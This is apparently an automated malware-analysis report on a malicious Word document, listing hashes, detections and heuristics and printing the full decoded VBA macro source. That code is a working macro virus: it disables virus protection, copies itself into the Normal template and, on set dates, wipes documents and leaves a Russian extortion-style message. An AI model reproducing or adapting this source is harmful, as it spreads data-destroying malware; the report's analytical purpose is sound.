Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c6642bdf79504904…

MALICIOUS

Office (OLE)

30.5 KB Created: 2003-02-26 21:53:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: a986d124854210ca52dda5efdcede4d1 SHA-1: 72eef68aa31faf043f2593c2488a9f3f2e51c9f7 SHA-256: c6642bdf79504904bb0831868ae207ef9067d8c49be4fd5fc6af087767c451b1
240 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic and VBA macros, including AutoOpen and AutoClose, which are commonly used to execute malicious code upon document opening or closing. The 'Stp' subroutine attempts to copy macros between the active document and the normal template, suggesting an attempt to establish persistence or modify the template. The ClamAV detections (Doc.Trojan.Sr-1 and Win.Trojan.Alicia-3) further confirm its malicious nature. The VBA code's intent appears to be the execution of a secondary payload, though the exact mechanism is obfuscated.

Heuristics 5

  • ClamAV: Doc.Trojan.Sr-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Sr-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3149 bytes
SHA-256: f4802810927660d48a2f931e4708bac2674cf710411a166ffb8a7e59d037a0f7
Detection
ClamAV: Win.Trojan.Alicia-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
' ModuleName = "Sr"

Sub Stp()
    On Error Resume Next
    zz = Word.ActiveDocument.FullName
    ee = Normal.ThisDocument.FullName

  Application.OrganizerCopy Source:=ee, _
    Destination:=zz, Name:="Sr", _
    Object:=3
      
  Application.OrganizerCopy Source:=zz, _
    Destination:=ee, Name:="Sr", _
    Object:=3
      
    Word.NormalTemplate.Save
End Sub

Sub AutoNew()
    Word.Options.VirusProtection = False
    ActiveDocument.Saved = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Application.Caption = "T" + ""
End Sub

Sub AutoOpen()
    Word.Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    ActiveDocument.Saved = False
    Application.Caption = "T" + ""
    Stp
End Sub

Sub AutoClose()
    Word.Options.VirusProtection = False
    Application.Caption = "TMicrosoft Word"
    Stp
    df = Word.ActiveDocument.FullName
    qq = DateTime.Date
    Drr = Word.Application.Path + "\" + "dc"
    If (Dir(Drr, vbDirectory) = "") Then MkDir (Drr)
    Pat = Word.Application.Path + "\" + "dc" + "\" + ActiveDocument.Name
    If qq = "25.06.01" Or qq = "26.06.01" Or qq = "27.06.01" Or qq = "28.06.01" Or qq = "29.06.01" Or qq = "30.06.01" Then
    Application.ActiveDocument.Password = "agl"
    ActiveDocument.Saved = False
    If ActiveDocument.Content.Find.Execute(FindText:="Hi.") = False Then
    ActiveDocument.SaveAs (Pat)
    Word.RecentFiles.Item(1).Delete
    End If
    ActiveDocument.Select
    Selection.Delete
    Selection.TypeText ("Hi.")
    Selection.TypeParagraph
    Selection.TypeText ("Данный вирус, это мой первий вирус, пока я тольку учусь, ответ на вопрос: как востановить свои данные вы, пока еще, сможете получить написав мне.")
    Selection.TypeParagraph
    Selection.TypeText (" Мой адрес treon9875@rambler.ru . До встречи! Кому нужен специализированный вирус пишите, всегда рад помочь")
    Selection.TypeParagraph
    Word.ActiveWindow.WindowState = wdWindowStateNormal
    Word.ActiveWindow.Width = 10
    End If
    Application.ActiveDocument.Password = ""
    ActiveDocument.Saved = False
    If Word.ActiveDocument.Path = "" Then
    ActiveDocument.Saved = True
    ActiveDocument.Saved = False
    Else: ActiveDocument.SaveAs (df)
    End If
    Application.Caption = ""
End Sub

'Sub viewvbcode()
'MsgBox ("Эта возможность заблокирована")
'uf.Show
'If a <> "семья" Then MsgBox ("Пароль не верен") Else Word.WordBasic.AppActivate ("пароль введен")

'End Sub